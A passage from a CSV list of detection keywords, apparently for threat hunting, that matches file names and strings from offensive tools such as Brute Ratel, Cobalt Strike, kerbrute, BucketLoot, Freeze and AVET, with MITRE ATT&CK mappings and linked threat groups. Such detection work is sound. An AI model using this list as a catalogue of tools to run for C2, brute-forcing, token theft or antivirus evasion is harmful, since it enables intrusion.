T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteloader*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*brute-locadmin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*brute-ratel-*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BruteRatel*.tar.gz*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BruteRatel*.zip*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bruteratel.com/*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bruteratel/*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Brute-Ratel-C4*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Brutesploit.git*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*BruteSploit/wlist/*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*brutespray*","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","1772","378","2023-03-15T23:00:29Z","2017-04-05T17:05:10Z" +"*BruteStager.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*BruteStager.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*bruteuser.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteuserCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*BruteX*","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","N/A","10","1714","562","2023-08-16T04:00:18Z","2015-06-01T22:28:19Z" +"*bshinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bshinject*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bshspawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bsteal_token*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bsteal_token*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bucketloot -*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot https://*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot.exe -*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot.exe https://*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-darwin64*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-freebsd64*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*BucketLoot-master*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-openbsd64*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-windows32.exe*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*bucketloot-windows64.exe*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*buffer_overflow.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*bug: pid active in ptrace_sandbox_free*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*-Build $RandomAttackPath*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*build Freeze.go*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*build SourcePoint.go*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*build Supernova.go*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*build.ps1 -commands * -profile *selfcontained -singlefile*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*build.ps1 -profiles * -commands * -compressed*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*build/breg.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*build_40xshikata_revhttpsunstaged_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_50xshikata_quiet_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_50xshikata_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_asciimsf_fromcmd_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_asciimsf_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_avetenc_dynamicfromfile_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_avetenc_fopen_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_avetenc_mtrprtrxor_revhttps_win64.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" 